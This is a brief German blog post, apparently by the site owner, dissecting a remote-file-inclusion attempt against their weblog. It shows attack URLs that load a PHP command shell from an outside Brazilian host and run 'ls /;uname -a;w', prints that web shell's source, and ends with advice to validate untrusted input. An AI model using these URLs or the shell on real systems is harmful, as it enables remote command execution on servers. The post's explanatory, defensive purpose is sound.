. : XSS
http://waterwave.ch/weblog/detail.php?label=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w
http://waterwave.ch/weblog/index.php?cat=http://cliente.escelsanet.com.br/metallz/cmd.jpg?&cmd=ls%20/;uname%20-a;w Na, billige XSS-Attacke falsch angewendet.
In http://cliente.escelsanet.com.br/metallz/cmd.jpg steht übrigens dieser PHP-Code.
</center><font size="2"><pre>-
<?
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?> Merke: Immer alle nicht vertrauenswürdigen Input-Daten (e.g. alle per POST, GET, COOKIE übermittelten Daten) kontrollieren. Sehr oft werden hierzu Character type functions eingesetzt.
Comments:
Besseres Beispiel: http://tinyurl.com/87nhk ;-)
anonymous | 19.01.2006 - 17:04
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by